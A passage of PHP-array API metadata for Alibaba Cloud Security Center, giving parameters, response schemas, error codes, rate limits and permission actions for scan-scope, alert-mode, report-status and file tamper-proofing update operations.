}\\n}","type":"json"}]', 'title' => 'Modify Custom Check Item Policy Classification Settings', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateCheckPolicy'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdateCheckPolicy', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'CustomCheckStandardPolicy', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:customcheckstandardpolicy/{#customcheckstandardpolicyId}'], ], ], ], ], ], 'UpdateCheckScopeConfig' => [ 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '119340', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'ConfigId', 'in' => 'query', 'schema' => ['description' => 'The ID of the configuration.'."\n" .'>Call the [GetCheckScopeConfig](~~GetCheckScopeConfig~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => '00cfa8161da093089e6804ba6a33****', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The scan scope configuration type. Valid values:'."\n" .'- **1**: scan by instance'."\n" .'- **3**: scan all', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'AutoType', 'in' => 'query', 'schema' => ['description' => 'The automatic scan configuration type. Valid values:'."\n" .'- **0**: disable automatic scan'."\n" .'- **1**: automatically scan newly added cloud assets', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'AutoConfig', 'in' => 'query', 'schema' => ['description' => 'The automatic scan configuration as a JSON string. The following fields are included:'."\n" ."\n" .'- **autoInclude**: specifies whether to enable automatic scan. Valid values: **true**: enabled. **false**: disabled.'."\n" .'- **autoRule**: the enablement configuration.'."\n" .'- **ruleOperator**: the enablement configuration rule. Set the value to **include**.'."\n" .'- **operator**: the logical operator. Set the value to **or**.'."\n" .'- **rule**: the rule.'."\n" .'- **condition**: the rule condition. Valid values: **vendor**: vendor. **assetType**: level-1 asset type. **assetSubType**: level-2 asset type.'."\n" .'> For more information, refer to the [GetCloudAssetCriteria](~~GetCloudAssetCriteria~~) operation.', 'type' => 'string', 'required' => false, 'example' => '"{\\"autoInclude\\":true,\\"autoRule\\":{\\"ruleOperator\\":\\"include\\",\\"operator\\":\\"or\\",\\"rule\\":[{\\"condition\\":\\"assetSubType\\",\\"ruleOperator\\":\\"include\\",\\"value\\":[{\\"vendor\\":\\"0\\",\\"assetType\\":\\"0\\",\\"assetSubType\\":\\"100\\"}]}]}}"', 'title' => ''], ], [ 'name' => 'ResourceDirectoryAccountId', 'in' => 'query', 'schema' => ['type' => 'integer', 'format' => 'int64', 'description' => '', 'title' => '', 'example' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'UpdateCheckScopeConfigResponse', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '676F80E3-4B3F-43DA-9CBB-5FF79F202AA2', 'title' => ''], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" .'- **true**: The request was successful.'."\n" .'- **false**: The request failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Other values indicate failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The response message.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'Data' => [ 'description' => 'The returned data.', 'type' => 'object', 'properties' => [ 'GmtCreate' => ['description' => 'The creation time.', 'type' => 'string', 'example' => '2022-10-16 18:17:16', 'title' => ''], 'GmtModified' => ['description' => 'The modification time.', 'type' => 'string', 'example' => '2026-04-09 18:56:15', 'title' => ''], 'ConfigId' => ['description' => 'The ID of the configuration.', 'type' => 'string', 'example' => '97a1fed216908e417407344e1505xxxx', 'title' => ''], 'Type' => ['description' => 'The scan scope configuration type. Valid values:'."\n" .'- **1**: scan by instance'."\n" .'- **3**: scan all', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'AutoType' => ['description' => 'The automatic scan configuration type. Valid values:'."\n" .'- **0**: disable automatic scan'."\n" .'- **1**: automatically scan newly added cloud assets', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'AutoConfig' => ['description' => 'The automatic scan configuration as a JSON string. The following fields are included:'."\n" ."\n" .'- **autoInclude**: specifies whether to enable automatic scan. Valid values: **true**: enabled. **false**: disabled.'."\n" .'- **autoRule**: the enablement configuration.'."\n" .'- **ruleOperator**: the enablement configuration rule. Set the value to **include**.'."\n" .'- **operator**: the logical operator. Set the value to **or**.'."\n" .'- **rule**: the rule.'."\n" .'- **condition**: the rule condition. Valid values: **vendor**: vendor. **assetType**: level-1 asset type. **assetSubType**: level-2 asset type.'."\n" .'> For more information, refer to the [GetCloudAssetCriteria](~~GetCloudAssetCriteria~~) operation.', 'type' => 'string', 'example' => '"{\\"autoInclude\\":true,\\"autoRule\\":{\\"ruleOperator\\":\\"include\\",\\"operator\\":\\"or\\",\\"rule\\":[{\\"condition\\":\\"assetSubType\\",\\"ruleOperator\\":\\"include\\",\\"value\\":[{\\"vendor\\":\\"0\\",\\"assetType\\":\\"0\\",\\"assetSubType\\":\\"100\\"}]}]}}"', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'RdCheckNoPermission', 'errorMessage' => 'Resource directory account verification has no permission.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ['errorCode' => 'RdCheckInnerError', 'errorMessage' => 'Resource directory account service internal error.', 'description' => ''], ], ], 'title' => 'Update check scope configuration', 'summary' => 'Updates the check scope configuration.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"676F80E3-4B3F-43DA-9CBB-5FF79F202AA2\\",\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"Data\\": {\\n \\"GmtCreate\\": \\"2022-10-16 18:17:16\\",\\n \\"GmtModified\\": \\"2026-04-09 18:56:15\\",\\n \\"ConfigId\\": \\"97a1fed216908e417407344e1505xxxx\\",\\n \\"Type\\": 1,\\n \\"AutoType\\": 1,\\n \\"AutoConfig\\": \\"\\\\\\"{\\\\\\\\\\\\\\"autoInclude\\\\\\\\\\\\\\":true,\\\\\\\\\\\\\\"autoRule\\\\\\\\\\\\\\":{\\\\\\\\\\\\\\"ruleOperator\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"include\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"operator\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"or\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"rule\\\\\\\\\\\\\\":[{\\\\\\\\\\\\\\"condition\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"assetSubType\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"ruleOperator\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"include\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"value\\\\\\\\\\\\\\":[{\\\\\\\\\\\\\\"vendor\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"0\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"assetType\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"0\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"assetSubType\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"100\\\\\\\\\\\\\\"}]}]}}\\\\\\"\\"\\n }\\n}","type":"json"}]', ], 'UpdateClientAlertMode' => [ 'summary' => 'Modifies alerting settings for servers.', 'methods' => ['post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '192122', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Uuids', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The UUIDs of servers.'."\n", 'type' => 'array', 'items' => ['description' => 'The UUID of the server.'."\n", 'type' => 'string', 'required' => false, 'example' => 'becf3661-80aa-4083-858d-619dafa3449a', 'title' => ''], 'required' => false, 'maxItems' => 500, 'minItems' => 1, 'title' => '', 'example' => '', ], ], [ 'name' => 'Mode', 'in' => 'query', 'schema' => [ 'description' => 'The protection mode. Valid values:'."\n" ."\n" .'* **strict**: The strict mode. False positives may be generated. We recommend that you enable this mode during major events.'."\n" .'* **balance**: The balanced mode. More risks can be detected with less false positives in this mode.'."\n", 'type' => 'string', 'required' => false, 'example' => 'balance', 'enum' => ['strict', 'balance'], 'title' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '259E3E77-CA6D-5407-84A5-3A1C98D12F14'], 'Data' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"259E3E77-CA6D-5407-84A5-3A1C98D12F14\\",\\n \\"Data\\": true\\n}","type":"json"}]', 'title' => 'UpdateClientAlertMode', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateClientAlertMode'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdateClientAlertMode', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'UpdateCommonSwitchConfig' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '168747', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The type of the switch.'."\n" ."\n" .'> You can call the [ListClientUserDefineRules](~~ListClientUserDefineRules~~) or [ListSystemClientRules](~~ListSystemClientRules~~) operation to obtain the type from the response parameter SwitchId.', 'type' => 'string', 'required' => false, 'example' => 'USER-DEFINE-RULE-SWITCH-TYPE_190****', 'title' => ''], ], [ 'name' => 'TargetDefault', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to turn on the switch for newly added servers. Valid values:'."\n" ."\n" .'- **add**: yes'."\n" ."\n" .'- **del**: no', 'type' => 'string', 'required' => false, 'example' => 'add', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '655B538A-A31B-58F2-A3FB-2EF4390D****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'UpdateCommonSwitchConfig', 'summary' => 'Updates the settings of common switches.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateCommonSwitchConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdateCommonSwitchConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"655B538A-A31B-58F2-A3FB-2EF4390D****\\"\\n}","type":"json"}]', ], 'UpdateCustomizeReportStatus' => [ 'summary' => 'Modifies the status of a security report.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'ReportId', 'in' => 'query', 'schema' => ['description' => 'The report ID.'."\n" .'>Call [DescribeCustomizeReportList](~~DescribeCustomizeReportList~~) to obtain this parameter.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '123', 'title' => ''], ], [ 'name' => 'ReportStatus', 'in' => 'query', 'schema' => ['description' => 'The report status. Valid values:'."\n" .' - **0**: Disabled.'."\n" .' - **1**: Enabled.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'PinnedTime', 'in' => 'query', 'schema' => ['description' => 'The pinning time. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1717430400000', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique ID for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '64C76BEE-6A47-54D9-BD91-BD3E8A1B****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Modify security report status', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'UpdateCustomizeReportStatus'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:UpdateCustomizeReportStatus', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"64C76BEE-6A47-54D9-BD91-BD3E8A1B****\\"\\n}","type":"json"}]', ], 'UpdateFileProtectClientEvent' => [ 'methods' => ['get', 'post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas4OHMAP'], ], 'parameters' => [ [ 'name' => 'SelectAll', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to select all.', 'type' => 'boolean', 'required' => true, 'example' => 'true', 'title' => ''], ], [ 'name' => 'IdList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of event IDs.', 'type' => 'array', 'items' => ['description' => 'The list of event IDs.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '123', 'title' => ''], 'required' => false, 'maxItems' => 500, 'title' => '', 'example' => '', ], ], [ 'name' => 'RuleName', 'in' => 'query', 'schema' => ['description' => 'The rule name.', 'type' => 'string', 'required' => false, 'example' => 'tetsRule', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => [ 'description' => 'The event status. Valid values:'."\n" .'- **0**: Unhandled.'."\n" .'- **1**: Handled.'."\n" .'- **2**: Whitelisted.', 'type' => 'string', 'enum' => ['0', '1', '2'], 'required' => false, 'example' => '1', 'title' => '', ], ], [ 'name' => 'AlertLevels', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of alert notification levels.', 'type' => 'array', 'items' => ['description' => 'The alert notification level. Valid values:'."\n" ."\n" .'0. No alert'."\n" .'1. Reminder'."\n" .'2. Suspicious'."\n" .'3. High-risk.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '2', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'InstanceId', 'in' => 'query', 'schema' => ['description' => 'The ID of the asset instance.', 'type' => 'string', 'required' => false, 'example' => 'i-bp1fu4aqltf1huhc****', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the protected server.', 'type' => 'string', 'required' => false, 'example' => 'ae1527a9-2308-46ab-b10a-48ae7ff7****', 'title' => ''], ], [ 'name' => 'InstanceName', 'in' => 'query', 'schema' => ['description' => 'The name of the asset instance.', 'type' => 'string', 'required' => false, 'example' => 'test', 'title' => ''], ], [ 'name' => 'InternetIp', 'in' => 'query', 'schema' => ['description' => 'The public IP address.', 'type' => 'string', 'required' => false, 'example' => '120.27.XX.XX', 'title' => ''], ], [ 'name' => 'IntranetIp', 'in' => 'query', 'schema' => ['description' => 'The internal IP address.', 'type' => 'string', 'required' => false, 'example' => '172.26.XX.XX', 'title' => ''], ], [ 'name' => 'StartTime', 'in' => 'query', 'schema' => ['description' => 'The start time.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1649260800000', 'title' => ''], ], [ 'name' => 'EndTime', 'in' => 'query', 'schema' => ['description' => 'The timestamp of the end time.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1650470399999', 'title' => ''], ], [ 'name' => 'Operation', 'in' => 'query', 'schema' => ['description' => 'The type of the operation.', 'type' => 'string', 'required' => false, 'example' => 'READ', 'title' => ''], ], [ 'name' => 'ProcPath', 'in' => 'query', 'schema' => ['description' => 'The process path.', 'type' => 'string', 'required' => false, 'example' => '/root/1111/****', 'title' => ''], ], [ 'name' => 'FilePath', 'in' => 'query', 'schema' => ['description' => 'The file path.', 'type' => 'string', 'required' => false, 'example' => '/etc/pam****', 'title' => ''], ], [ 'name' => 'ExcludeIdList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of excluded event IDs.', 'type' => 'array', 'items' => ['description' => 'The list of excluded IDs.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '12', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], [ 'name' => 'NewStatus', 'in' => 'query', 'schema' => [ 'description' => 'The new status. Valid values:'."\n" ."\n" .'- **0**: Unhandled.'."\n" .'- **1**: Handled.'."\n" .'- **2**: Whitelisted.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'enum' => ['0', '1', '2'], 'example' => '1', 'title' => '', ], ], [ 'name' => 'Remark', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The remarks.', 'type' => 'array', 'items' => ['description' => 'The remarks.', 'type' => 'string', 'required' => false, 'example' => 'testECS', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'Id of the request', 'type' => 'string', 'example' => '69BFFCDE-37D6-5A49-A8BC-BB03AC83****'], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParameter', 'errorMessage' => 'Illegal parameter, please check the param.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Update a web tamper-proofing protection event', 'summary' => 'Updates the status of a file protection event.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdateFileProtectClientEvent', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"69BFFCDE-37D6-5A49-A8BC-BB03AC83****\\"\\n}","type":"json"}]', ], 'UpdateFileProtectClientRule' => [ 'methods' => ['post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas4OHMAP'], ], 'parameters' => [ [ 'name' => 'RuleName', 'in' => 'query', 'schema' => ['description' => 'The name of the rule.', 'type' => 'string', 'required' => true, 'example' => 'text-001', 'title' => ''], ], [ 'name' => 'ProcPaths', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of process listening paths. Wildcards are supported.', 'type' => 'array', 'items' => ['description' => 'The list of process listening paths. Wildcards are supported.', 'type' => 'string', 'required' => false, 'example' => '/usr/local/*', 'title' => ''], 'required' => true, 'maxItems' => 128, 'minItems' => 1, 'title' => '', 'example' => '', ], ], [ 'name' => 'FilePaths', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of monitored file paths. Wildcards are supported.', 'type' => 'array', 'items' => ['description' => 'The list of monitored file paths. Wildcards are supported.', 'type' => 'string', 'required' => false, 'example' => '/usr/*', 'title' => ''], 'required' => true, 'maxItems' => 128, 'minItems' => 1, 'title' => '', 'example' => '', ], ], [ 'name' => 'FileOps', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of operations performed on the file.', 'type' => 'array', 'items' => [ 'description' => 'The list of operations performed on the file.', 'type' => 'string', 'enum' => ['WRITE', 'READ', 'DELETE', 'RENAME', 'CHOWN'], 'required' => false, 'example' => 'WRITE', 'title' => '', ], 'required' => true, 'maxItems' => 128, 'minItems' => 1, 'title' => '', 'example' => '', ], ], [ 'name' => 'RuleAction', 'in' => 'query', 'schema' => [ 'description' => 'The action of the rule. Valid values:'."\n" ."\n" .'- **block**: Block.'."\n" ."\n" .'- **monitor**: Monitor.'."\n" ."\n" .'- **pass**: Allow.', 'type' => 'string', 'required' => true, 'enum' => ['block', 'monitor', 'pass'], 'example' => 'pass', 'title' => '', ], ], [ 'name' => 'AlertLevel', 'in' => 'query', 'schema' => [ 'description' => 'The alert notification level. Valid values:'."\n" ."\n" .'- 0: no alert'."\n" ."\n" .'- 1: reminder'."\n" ."\n" .'- 2: suspicious'."\n" ."\n" .'- 3: high-risk.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'enum' => ['0', '1', '2', '3'], 'example' => '0', 'title' => '', ], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => [ 'description' => 'The status of the rule. Valid values:'."\n" ."\n" .'- **0**: disabled'."\n" .'- **1**: enabled.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'enum' => ['0', '1'], 'example' => '1', 'title' => '', ], ], [ 'name' => 'Id', 'in' => 'query', 'schema' => ['description' => 'The unique ID.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '245', 'title' => ''], ], [ 'name' => 'FileTypes', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of protected file types.', 'type' => 'array', 'items' => ['description' => 'The list of protected file types.', 'type' => 'string', 'required' => false, 'example' => 'txt', 'title' => ''], 'required' => false, 'maxItems' => 128, 'minItems' => 1, 'title' => '', 'example' => '', ], ], [ 'name' => 'ExcludeUsers', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of users excluded from file protection.', 'type' => 'array', 'items' => ['description' => 'The list of users excluded from file protection.', 'type' => 'string', 'required' => false, 'example' => 'root', 'title' => ''], 'required' => false, 'maxItems' => 128, 'minItems' => 1, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'Id of the request', 'type' => 'string', 'example' => 'F8B6F758-BCD4-597A-8A2C-DA5A552C****'], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParameter', 'errorMessage' => 'Illegal parameter, please check the param.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Modify a web tamper-proofing rule', 'summary' => 'Updates a file protection rule.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'update', 'ramAction' => [ 'action' => 'yundun-sas:UpdateFileProtectClientRule', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"F8B6F758-BCD4-597A-8A2C-DA5A552C****\\"\\n}","type":"json"}]', ], 'UpdateFileProtectClientRuleStatus' => [ 'summary' => 'Updates the status of file tamper-proofing rules in batches.', 'methods' => ['post'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'update', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas4GT4R7'], ], 'parameters' => [ [ 'name' => 'SelectAll', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to select all rules.', 'type' => 'boolean', 'required' => true, 'example' => 'true', 'title' => ''], ], [ 'name' => 'IdList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of rule IDs.', 'type' => 'array', 'items' => ['description' => 'The list of rule IDs.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '123', 'title' => ''], 'required' => false, 'maxItems' => 500, 'title' => '', 'example' => '', ], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => [ 'description' => 'The policy status. Valid values:'."\n" .'- **0**: disabled.'."\n" .'- **1**: enabled.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'enum' => ['0', '1'], 'example' => '0', 'title' => '', ], ], [ 'name' => 'RuleName', 'in' => 'query', 'schema' => ['description' => 'The rule name.', 'type' => 'string', 'required' => false, 'example' => 'test', 'title' => ''], ], [ 'name' => 'RuleAction', 'in' => 'query', 'schema' => [ 'description' => 'The rule action. Valid values:'."\n" ."\n" .'- **block**: Block.'."\n" ."\n" .'- **monitor**: Monitor.'."\n" ."\n" .'- **pass**: Allow.', 'type' => 'string', 'required' => false, 'enum' => ['block', 'monitor', 'pass'], 'example' => 'pass', 'title' => '', ], ], [ 'name' => 'AlertLevel', 'in' => 'query', 'schema' => [ 'description' => 'The alert notification level. Valid values:'."\n" ."\n" .'- 0: no alert'."\n" ."\n" .'- 1: reminder'."\n" ."\n" .'- 2: suspicious'."\n" ."\n" .'- 3: high-risk.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'enum' => ['0', '1', '2', '3'], 'example' => '0', 'title' => '', ], ], [ 'name' => 'Platform', 'in' => 'query', 'schema' => ['description' => 'The operating system type. Valid values:'."\n" ."\n" .'- **windows**: Windows'."\n" .'- **linux**: Linux.', 'type' => 'string', 'required' => false, 'example' => 'linux', 'title' => ''], ], [ 'name' => 'ExcludeIdList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of excluded rule IDs.', 'type' => 'array', 'items' => ['description' => 'The excluded rule ID.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '12', 'title' => ''], 'required' => false, 'maxItems' => 100, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'Schema of Response', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'Id of the request', 'type' => 'string', 'example' => 'F8B6F758-BCD4-597A-8A2C-DA5A552C****'], ], 'example' => '', ], ], ], 'errorCodes' => 